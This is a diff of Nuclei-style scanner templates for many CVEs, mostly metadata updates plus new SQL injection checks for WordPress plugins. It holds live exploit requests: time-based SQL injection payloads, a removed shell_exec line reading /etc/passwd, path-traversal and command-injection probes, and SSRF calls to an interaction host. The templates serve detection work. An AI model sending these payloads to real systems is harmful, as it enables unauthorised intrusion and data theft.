@ -50,4 +50,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502206e56a0d536dfc8d4ed10ae0505f2d2548b6c986854d0813c6e8185acc66756d9022100e74e57bbb9b04d2860f174d0f9effbef03a265a0ada954ea317f3fffa89a12ca:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100b58e1f2764198a04cdc831884ce49a67189b6a1988fcf7e27f9d82ed83cd2a3402206c36044d3ad9e30032c1e67d471ee256bb7602b09812ffc7830995d5808c7ff1:922c64590222798bb761d5b6d8e72950

5
http/cves/2018/CVE-2018-20463.yaml
View File

@ -15,13 +15,14 @@ info:
- https://wordpress.org/plugins/jsmol2wp/
- https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt
- https://nvd.nist.gov/vuln/detail/CVE-2018-20463
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-20463
cwe-id: CWE-22
epss-score: 0.01939
epss-percentile: 0.87393
epss-percentile: 0.88289
cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:*
metadata:
verified: true
@ -53,4 +54,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502205f9aeadd874f5fdf363e87acc0ec34f995e53677d28cbc33b27cf113d9de2b03022100c5b000d74f0180cb372d2dd355622f03e7cb2b5180ac3cb0e6f0660049f49dba:922c64590222798bb761d5b6d8e72950
# digest: 4b0a004830460221008b0f6a4e144ec0a4f5fb0f772930b5da535472e941723be6c675589ac426a8b5022100bef4cc125a636184009e644aeb5fa64c4a868c49d7c081e63409ed228515e3ed:922c64590222798bb761d5b6d8e72950

4
http/cves/2019/CVE-2019-17382.yaml
View File

@ -27,7 +27,7 @@ info:
max-request: 100
vendor: zabbix
product: zabbix
tags: cve2019,cve,brute-force,auth-bypass,login,edb,zabbix
tags: cve2019,cve,bruteforce,auth-bypass,login,edb,zabbix
http:
- raw:
@ -49,4 +49,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a004830460221009f2eef4ff9783ccdb0da0deb516cbeef6088cf8748cea7f07e2d0db26e145471022100e1a20eb9c42ec21526ec4e60014c9c44a9cb9eebf923e1e0016faabd478bd8ce:922c64590222798bb761d5b6d8e72950
# digest: 4b0a004830460221009174b05ef7a525c5b373a0d82c9f2e6ef53e2f208703ddae369493fdf4e868d5022100ffcea06c1174e9a583cf539ef4f49ecda6eb0849493b197b58859a5e058e7cb4:922c64590222798bb761d5b6d8e72950

20
http/cves/2020/CVE-2020-15227.yaml
View File

@ -27,20 +27,24 @@ info:
max-request: 1
vendor: nette
product: application
fofa-query: app="nette-Framework"
verified: true
tags: cve2020,cve,nette,rce
http:
- method: GET
path:
- "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"
- "{{BaseURL}}/nette.micro/?callback=phpcredits"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: word
part: body
words:
- "PHP Credits"
- type: status
status:
- 200
# digest: 4a0a00473045022100c514809246bae4d622a6f54b7f309f8d1838a8320122852f607689aa0d8591f00220583827d07fe105e21e3f2c8d355bd4a383c60d0b9fa26ec3897668a09ea6a421:922c64590222798bb761d5b6d8e72950
- type: word
part: header
words:
- "Nette Framework"
# digest: 4a0a00473045022100c7edf32bbe09d40436d30da39271cd16112ead5a0c94b155a42dce50938fb84c0220526028064e9f272d8365aafc3b6b7558d1f606bd48da3dcf7576ceee091b452e:922c64590222798bb761d5b6d8e72950

6
http/cves/2020/CVE-2020-24223.yaml
View File

@ -20,8 +20,8 @@ info:
cvss-score: 6.1
cve-id: CVE-2020-24223
cwe-id: CWE-79
epss-score: 0.00976
epss-percentile: 0.81758
epss-score: 0.0069
epss-percentile: 0.79602
cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:*
metadata:
max-request: 1
@ -49,4 +49,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a00483046022100c973b82339421ec3089eac4ceee54851fb8db56c023e4110994b8c16b279307f022100ba5f5c61a9f8acb6755ba89ca34bb684ee60ac4e1e7c96f40f0688789b22e49a:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502203465eb756d9c1c2a642192e678566a419006885438b5721b7a8b54470650a994022100a3b09f8d55baad75a18b6eb7fab36fd7cf976201304457c717358dd7b6fa2862:922c64590222798bb761d5b6d8e72950

4
http/cves/2020/CVE-2020-27838.yaml
View File

@ -28,7 +28,7 @@ info:
vendor: redhat
product: keycloak
shodan-query: "title:\"keycloak\""
tags: cve,cve2020,keyclock,exposure
tags: cve,cve2020,keycloak,exposure
http:
- method: GET
@ -52,4 +52,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a00483046022100a6e9bf7a3b64c5e90d619114c77ef26e4910bb56c4488208e2381e574562d66e022100944c1456d486efb48fc5d8d143759d157d22b7b23d81cffcf4cbd94219ae8cd0:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100e340099dadc3710a63b8cc3e0182b0c1a738f7480c069fa5c39913092f31b39802201ad2dbae637d451dd3a442b8c8a7d2f0d5244240545b98ba4431a62241c66fa6:922c64590222798bb761d5b6d8e72950

6
http/cves/2021/CVE-2021-21805.yaml
View File

@ -14,13 +14,15 @@ info:
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805
- https://nvd.nist.gov/vuln/detail/CVE-2021-21805
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-21805
cwe-id: CWE-78
epss-score: 0.97374
epss-percentile: 0.99892
epss-percentile: 0.99895
cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*
metadata:
verified: true
@ -52,4 +54,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100f2a3e97b98df27aafb1f8001f577c595d1cbb4fed075db594314502fbf283bd602204b4e9e0d429dacbd3c7672f6fd16118bbc7e73d54077c27d333a19e89ac0f5db:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220239da739e577f078def3474254759fb447a0e1c7ae5e5c894fc15f3748b3752b022039afb1da09e145478b68a7981ab742ece2729a5f473a12d97e7c259b4bddafb6:922c64590222798bb761d5b6d8e72950

4
http/cves/2021/CVE-2021-22873.yaml
View File

@ -21,7 +21,7 @@ info:
cve-id: CVE-2021-22873
cwe-id: CWE-601
epss-score: 0.00922
epss-percentile: 0.81209
epss-percentile: 0.82474
cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*
metadata:
verified: true
@ -49,4 +49,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 490a0046304402206825e5ab8251fc139a7b9f7ac5b06687ca56ae1e65ed767ca11c20c7930c7e1f02205a2f6d3c6d66a885a07cd69568accc9951b72dc883ed9cc1f62f561083da2e0c:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502201f562b389b6a5f97abaafe839123249c8bfc49d20d8cc12c06a61ee23b840795022100e4d6049c15f40c1564d2e55b52873ca91a7030a85feb7605ebf54ce291e513d5:922c64590222798bb761d5b6d8e72950

49
http/cves/2021/CVE-2021-24442.yaml Normal file
View File

@ -0,0 +1,49 @@
id: CVE-2021-24442
info:
name: Wordpress Polls Widget < 1.5.3 - SQL Injection
author: ritikchaddha
severity: critical
description: |
The Poll, Survey, Questionnaire and Voting system WordPress plugin before 1.5.3 did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks
remediation: Fixed in 1.5.3
reference:
- https://wpscan.com/vulnerability/7376666e-9b2a-4239-b11f-8544435b444a/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24442
- https://wordpress.org/plugins/polls-widget/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24442
cwe-id: CWE-89
epss-score: 0.00212
epss-percentile: 0.58237
cpe: cpe:2.3:a:wpdevart:poll\,_survey\,_questionnaire_and_voting_system:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: wpdevart
product: poll\,_survey\,_questionnaire_and_voting_system
framework: wordpress
publicwww-query: "/wp-content/plugins/polls-widget/"
tags: wpscan,cve,cve2021,wp,wp-plugin,wpscan,wordpress,polls-widget,sqli
http:
- raw:
- |
@timeout: 25s
POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Forwarded-For: {{randstr}}
question_id=1&poll_answer_securety=8df73ed4ee&date_answers%5B0%5D=SLEEP(5)
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code == 200'
- 'contains_all(body, "{\"answer_name", "vote\":")'
condition: and
# digest: 4a0a00473045022077e2d0f0096519c85cc2560e8aa0947b9480af46a12b487659284f2207bd7a13022100eff5ad69413aa6014c4fc03c62f75c9e69ec2e5bfb10908470a3f44c6bcecdff:922c64590222798bb761d5b6d8e72950

10
http/cves/2021/CVE-2021-24762.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-24762
info:
name: WordPress Perfect Survey<1.5.2 - SQL Injection
name: WordPress Perfect Survey <1.5.2 - SQL Injection
author: cckuailong
severity: critical
description: |
@ -13,8 +13,8 @@ info:
reference:
- https://www.exploit-db.com/exploits/50766
- https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-24762/vultarget
- https://nvd.nist.gov/vuln/detail/CVE-2021-24762
- https://wpscan.com/vulnerability/c1620905-7c31-4e62-80f5-1d9635be11ad
- https://nvd.nist.gov/vuln/detail/CVE-2021-24762
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -28,13 +28,13 @@ info:
vendor: getperfectsurvey
product: perfect_survey
framework: wordpress
tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,unauth,edb,getperfectsurvey
tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,edb,getperfectsurvey
http:
- raw:
- |
@timeout: 15s
POST /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1
GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
@ -51,4 +51,4 @@ http:
- type: status
status:
- 404
# digest: 4b0a00483046022100dc31a17605a60d5af3be547b7336024caf4ab4335ca417a63422a3bcc4bbb8b6022100b2d7e5fce40df099911318ad66b154d1f69a76338f56107dc6284b6c231579ad:922c64590222798bb761d5b6d8e72950
# digest: 4b0a0048304602210088b2f8641efb17289d0c9fa1e0fc57697b83b89f2c710a54603d6e0536009441022100c2ca459924277032aeae17d881fd19c80a6e3501bb3ff5be948390480bec353d:922c64590222798bb761d5b6d8e72950

70
http/cves/2021/CVE-2021-24849.yaml Normal file
View File

@ -0,0 +1,70 @@
id: CVE-2021-24849
info:
name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection
author: ritikchaddha
severity: critical
description: |
The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
reference:
- https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24849
- https://wordpress.org/plugins/wc-multivendor-marketplace/
remediation: Fixed in 3.4.12
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24849
cwe-id: CWE-89
cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
epss-score: 0.00199
epss-percentile: 0.56492
metadata:
product: "frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible"
framework: wordpress
publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"
verified: true
max-request: 3
vendor: wclovers
tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,wpscan,sqli
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce")
condition: and
internal: true
- raw:
- |
@timeout: 20s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{{post_data}}
payloads:
post_data:
- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--"
- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code == 200'
- 'contains(header, "application/json")'
- 'contains(body, "success")'
condition: and
# digest: 4a0a00473045022100ef54cd087054515b6ef2f1935d258ecea55b3abf384cd95798b8cd351a5f1fe90220070a59d1e5a3ab49e8fc248e2ddc238e33958d75f7b3cfc5700b5018b8116f82:922c64590222798bb761d5b6d8e72950

51
http/cves/2021/CVE-2021-24943.yaml Normal file
View File

@ -0,0 +1,51 @@
id: CVE-2021-24943
info:
name: Registrations for the Events Calendar < 2.7.6 - SQL Injection
author: ritikchaddha
severity: critical
description: |
The Registrations for the Events Calendar WordPress plugin before 2.7.6 does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection.
remediation: Fixed in 2.7.6
reference:
- https://wpscan.com/vulnerability/ba50c590-42ee-4523-8aa0-87ac644b77ed/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24943
- https://wordpress.org/plugins/registrations-for-the-events-calendar/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24943
cwe-id: CWE-89
epss-score: 0.00199
epss-percentile: 0.56492
cpe: cpe:2.3:a:roundupwp:registrations_for_the_events_calendar:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: roundupwp
product: registrations_for_the_events_calendar
framework: wordpress
publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/"
tags: wpscan,cve,cve2021,wp,wp-plugin,wpscan,wordpress,sqli,registrations-for-the-events-calendar
variables:
text: "{{rand_base(5)}}"
http:
- raw:
- |
@timeout: 20s
POST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
event_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(5)))vNpy)&email={{text}}@{{text}}.com
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code == 200'
- 'contains(body, "Please enter the email you registered with")'
condition: and
# digest: 490a0046304402205fdda9c8d4779e2557fe7c639bac3b8efca15af2034265114daf03628ab5e8f90220450c244cc25345ee7065bcecb32ae6c7b1e33cc7bd263a94334969d729692ca7:922c64590222798bb761d5b6d8e72950

14
http/cves/2021/CVE-2021-27748.yaml
View File

@ -18,13 +18,14 @@ info:
cve-id: CVE-2021-27748
metadata:
verified: true
max-request: 2
max-request: 3
shodan-query: http.html:"IBM WebSphere Portal"
tags: cve2021,cve,hcl,ibm,ssrf,websphere
http:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/docpicker/internal_proxy/http/oast.me'
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me'
@ -35,10 +36,13 @@ http:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Interactsh Server"
- type: status
status:
- 200
# digest: 4b0a00483046022100b6134f89233da535e75fb3d2abac8b55797ec0997bc234ba4559b250efcc3489022100c2cce298030c3efdccc4e809925e7d77d72aab31f1de74f9c86ab5ae022b0a1e:922c64590222798bb761d5b6d8e72950
- type: word
part: body_1
words:
- "Interactsh Server"
negative: true
# digest: 490a0046304402200ba3597e1cd51ea49029981ba317f0f962cc8082d2f3796e4d59fc9138bf9d9d0220226c8cb7207a0c85488b5ce96a38f6e0b616ebb9b487135b1fda864f9d6503d2:922c64590222798bb761d5b6d8e72950

6
http/cves/2021/CVE-2021-40651.yaml
View File

@ -18,8 +18,8 @@ info:
cwe-id: CWE-22
cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*
metadata:
max-request: 1
shodan-query: title:"openSIS"
shodan-query: "title:\"openSIS\""
max-request: 2
tags: cve,cve2021,lfi,os4ed,opensis,authenticated
http:
@ -42,4 +42,4 @@ http:
- 'contains(body_1, "openSIS")'
- "status_code == 200"
condition: and
# digest: 490a004630440220206394b303ab92ce65590e2c61e6eb5e9914219a5a0651ae69009a3f224109ff02207e729d1c062d3bd2e445a39a036992cc281564407a764e7f7ced5f02879f1034:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100924b4c785059886c8131bde539e1106c1be30952a7fea88bd992cb9cc3e7aca202204c4c3c880b323df6c23378c766e00dd0222716aa49f384cbc8f4c37b7c9ab38f:922c64590222798bb761d5b6d8e72950

6
http/cves/2021/CVE-2021-42013.yaml
View File

@ -1,4 +1,4 @@
id: "CVE-2021-42013"
id: CVE-2021-42013
info:
name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
@ -30,7 +30,7 @@ info:
product: http_server
tags: cve2021,cve,lfi,apache,rce,misconfig,traversal,kev
variables:
cmd: "echo COP-37714-1202-EVC | rev"
cmd: "echo 31024-1202-EVC | rev"
http:
- raw:
@ -66,4 +66,4 @@ http:
name: LFI
regex:
- "root:.*:0:0:"
# digest: 4a0a0047304502210090df2d0b0784bca0957316b00eda4a86eff7538dafa59481ce77ae33976454a0022052bca4f8bcc25e748dd8ed529bba9efc648ebfa54c19b8177f9c0c4fc2da6858:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402207470f1e0707171ed23b51282f56448b47cde756e37792253a19e6abc7c6a2b2b02203d6616b33eca925f272433a727bd685d8173454004fe09a7a6cdedc6daffb2a6:922c64590222798bb761d5b6d8e72950

4
http/cves/2021/CVE-2021-44910.yaml
View File

@ -10,7 +10,7 @@ info:
- https://github.com/chillzhuang/blade-tool
metadata:
max-request: 3
tags: cve,cve2023,springblade,blade,info-leak
tags: cve,cve2021,springblade,blade,info-leak
http:
- raw:
@ -44,4 +44,4 @@ http:
- type: status
status:
- 200
# digest: 490a004630440220304c9e6f27e05f7a603b614d229e59b893ef58d1528c62bd920706d9791db8d60220587079c49206fcc78d95924e9f27e54f38142ba541eb9ab46393425965a88263:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100b8965db2f12da5b92605ff6a2c1e8b8968f42d7d31259e428c54abd9c342066e02210098f2e2b339dcd515081900537d59c694775232efa61957cfe2944fc5c159c9db:922c64590222798bb761d5b6d8e72950

4
http/cves/2022/CVE-2022-0776.yaml
View File

@ -21,7 +21,7 @@ info:
cve-id: CVE-2022-0776
cwe-id: CWE-79
epss-score: 0.001
epss-percentile: 0.40832
epss-percentile: 0.40075
cpe: cpe:2.3:a:revealjs:reveal.js:*:*:*:*:*:node.js:*:*
metadata:
vendor: revealjs
@ -48,4 +48,4 @@ headless:
part: extract
words:
- "true"
# digest: 4a0a00473045022015776ab1f8ee5f7cbd078059bc34167a0b8ca0a11a1bda34723f7ec03d31b6c302210098d1c6a54ecbafb3158390aea2498590fe70df9d78d3266d388274859a641533:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100822f5151d594a59ff99bde533919eb403ddd05ab8d041ea5963a1c88f81d84320221008c8e17c078665f80ff1f6815e2f071996a8d9e4712b43e3bf775f0c2db3e0e12:922c64590222798bb761d5b6d8e72950

4
http/cves/2022/CVE-2022-2034.yaml
View File

@ -28,7 +28,7 @@ info:
vendor: automattic
product: sensei_lms
framework: wordpress
tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,brute-force,hackerone,wordpress,wp-plugin,automattic
tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,bruteforce,hackerone,wordpress,wp-plugin,automattic
http:
- method: GET
@ -56,4 +56,4 @@ http:
- type: status
status:
- 200
# digest: 490a0046304402201f56469497c402e5060dd148bc20614451e7dca2ff2a02ed0137deb3c983730102203aef693927819b4ac18f1f31b55f4799f6de8c2477e411a36515df9dba050dc5:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402207c51a21553085f96246b9b7a7b8fcb17455c8ede92140fc56ac74b94c60b3fcf022054295c2dbda0cd3975caa9c8ac89cd1d99b8f237e8fe3258e096d29e53f99f61:922c64590222798bb761d5b6d8e72950

4
http/cves/2022/CVE-2022-26263.yaml
View File

@ -22,7 +22,7 @@ info:
cve-id: CVE-2022-26263
cwe-id: CWE-79
epss-score: 0.00147
epss-percentile: 0.50638
epss-percentile: 0.49633
cpe: cpe:2.3:a:yonyou:u8\+:13.0:*:*:*:*:*:*:*
metadata:
verified: true
@ -43,4 +43,4 @@ headless:
- '<frame src="javascript:console.log(document.domain)"'
- 'webhelp4.js'
condition: and
# digest: 4a0a00473045022100a72f95b8648b73eb2e4cf2ea58e09902bdd87b68ed16d6258763f77029657162022064b391ae3ee631c189007bc15526ede89c3be32159ec215d129a1840544b297e:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100c124eb614790888649b3ad794123f8a4d5127efb6b3dfcccc25a1431ae2dd660022100bdd24ef15743a8543fc37ed7a7e4a0399762873c6016d5cd6a811baa514a747d:922c64590222798bb761d5b6d8e72950

4
http/cves/2022/CVE-2022-30776.yaml
View File

@ -22,7 +22,7 @@ info:
cve-id: CVE-2022-30776
cwe-id: CWE-79
epss-score: 0.00112
epss-percentile: 0.44504
epss-percentile: 0.43631
cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:*
metadata:
verified: true
@ -52,4 +52,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502203171cb9a5a9125732f06bba74b71efc2e09ae7c92ad33bcca6e6356b5d541fe702210081422e4791a4a926b08807deffab9bf4cb8eab98c0f9897922d586b01218bf06:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502210098e7e92637618d4c3c5540938565842f9d2479c1b7a7ca9a9333b2e0bf64a29b022077e0d1d54bd671842a9ba69fdbad1ed67e8c6f085c3235fde69b2d9e18009833:922c64590222798bb761d5b6d8e72950

4
http/cves/2022/CVE-2022-33891.yaml
View File

@ -37,7 +37,7 @@ variables:
http:
- method: GET
path:
- '{{BaseURL}}/doAs?=`{{url_encode("{{command}}")}}`'
- '{{BaseURL}}/?doAs=`{{url_encode("{{command}}")}}`'
matchers-condition: and
matchers:
@ -45,4 +45,4 @@ http:
part: body
words:
- "19833-2202-EVC"
# digest: 4a0a004730450221008bb8dca83860e99f6649206e34e12203a4ef600bbafcd7ae6b135b537faab9990220205c3ed10d667efd9a2e7f2128c855334fab697f0bf55bf5792362c774f88c91:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100c1235eac532c6d726073650001ee75a510e3d2b869c6174b06e4a249f1d236090220564440e9e87fc5f90b25cfc4108c5aa04b592bc0e6c584c01fec85b312622f08:922c64590222798bb761d5b6d8e72950

19
http/cves/2022/CVE-2022-38131.yaml
View File

@ -6,28 +6,29 @@ info:
severity: medium
description: |
RStudio Connect prior to 2023.01.0 is affected by an Open Redirect issue. The vulnerability could allow an attacker to redirect users to malicious websites.
impact: |
An attacker can exploit the vulnerability to redirect users to malicious websites, potentially leading to phishing attacks or other security breaches.
remediation: |
This issue is fixed in Connect v2023.05. Additionally, for users running Connect v1.7.2 and later, the issue is resolvable via a configuration setting mentioned in the support article.
reference:
- https://tenable.com/security/research/tra-2022-30
- https://support.posit.co/hc/en-us/articles/10983374992023-CVE-2022-38131-configuration-issue-in-Posit-Connect
- https://github.com/JoshuaMart/JoshuaMart
impact: |
An attacker can exploit the vulnerability to redirect users to malicious websites, potentially leading to phishing attacks or other security breaches.
remediation: |
This issue is fixed in Connect v2023.05. Additionally, for users running Connect v1.7.2 and later, the issue is resolvable via a configuration setting mentioned in the support article.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-38131
cwe-id: CWE-601
cpe: cpe:2.3:a:rstudio:connect:*:*:*:*:*:*:*:*
epss-score: 0.0006
epss-percentile: 0.23591
cpe: cpe:2.3:a:rstudio:connect:*:*:*:*:*:*:*:*
metadata:
product: connect
shodan-query: "http.favicon.hash:217119619"
fofa-query: "app=\"RStudio-Connect\""
max-request: 1
verified: true
vendor: rstudio
product: connect
shodan-query: http.favicon.hash:217119619
fofa-query: app="RStudio-Connect"
tags: tenable,cve,cve2022,redirect,rstudio
http:
@ -46,4 +47,4 @@ http:
- type: status
status:
- 307
# digest: 4a0a00473045022100e9632f43574d44779bc09a10a78cb6835cc4b0179a707b395efecda59dcb8b5402205a72129b99d873d786c6aa9062e142a0b02192b31aa930c1a234a6d61558b479:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100aed598584561fa1188599f4a3fa2ff5ae9149e94b624fef3be306a7a74429c3f02201c02b4ebc6bfa15076a56527dc53df6e0be1e5d7f890dbc1558b26e30d35059b:922c64590222798bb761d5b6d8e72950

6
http/cves/2022/CVE-2022-4140.yaml
View File

@ -18,8 +18,8 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-4140
cwe-id: CWE-552
epss-score: 0.01317
epss-percentile: 0.84504
epss-score: 0.00932
epss-percentile: 0.82572
cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@ -54,4 +54,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a00483046022100c309f56d1bc6b8b3ad4aeedfea6624e9072d042193f145856563965410ce9e7c022100cc3f6acff92ea09cb461e67964a2e5973fbb82fdd391e5176e287a0be8c759c1:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402200691e9b2e104e67432ef4041648aca88eaa5a1fc58bbc764da8a0cf8240733da022015c0a0d07bcd6552d8c77f685c7c9bc595e3e7e9f3d8bf9b201968fcd4af75b4:922c64590222798bb761d5b6d8e72950

4
http/cves/2023/CVE-2023-0552.yaml
View File

@ -17,7 +17,7 @@ info:
cve-id: CVE-2023-0552
cwe-id: CWE-601
epss-score: 0.00086
epss-percentile: 0.35637
epss-percentile: 0.34914
cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@ -38,4 +38,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
# digest: 4a0a004730450221008eccfd0ecd7398b3566c5cfec47a5d3396899495831dabbee13a144918b2127e0220232a7e35aba58e28f2c38ac75f7f4558d7419e63c82e7b145dba6569f3e52fcf:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402201ab8dcd9693d8e9c7b7e3c2ac162de7610f21d7c3523e623a005ecdeababa57902203039fe388db8f4aef6c49c40a2cff545792484a6dda13261675b612810c874f9:922c64590222798bb761d5b6d8e72950

4
http/cves/2023/CVE-2023-24489.yaml
View File

@ -28,7 +28,7 @@ info:
vendor: citrix
product: sharefile_storage_zones_controller
shodan-query: title:"ShareFile Storage Server"
tags: cve2023,cve,sharefile,rce,intrusive,fileupload,brute-force,kev,citrix
tags: cve2023,cve,sharefile,rce,intrusive,fileupload,bruteforce,kev,citrix
variables:
fileName: '{{rand_base(8)}}'
@ -61,4 +61,4 @@ http:
- type: dsl
dsl:
- 'BaseURL+ "/cifs/" + fileName + ".aspx"'
# digest: 4a0a00473045022100b8908e3d0d507eafb4daa66943662e7f35d530024af777cd331040b9eda4540d022022868e31a2dbfcfb4347f872741b77feac8ac0a89509d5d3fc045ecd373c196d:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502205ab85a74f3c255c163c9d99bda2ff69666328d81782c9b4a8c2bc1d63128106b022100c10ae18b7db4ed08a5e2b324af93397140801b423282274cc2cbe4ddb0e93b0a:922c64590222798bb761d5b6d8e72950

4
http/cves/2023/CVE-2023-26255.yaml
View File

@ -22,7 +22,7 @@ info:
cve-id: CVE-2023-26255
cwe-id: CWE-22
epss-score: 0.15138
epss-percentile: 0.95348
epss-percentile: 0.95663
cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:*
metadata:
max-request: 1
@ -52,4 +52,4 @@ http:
- type: status
status:
- 200
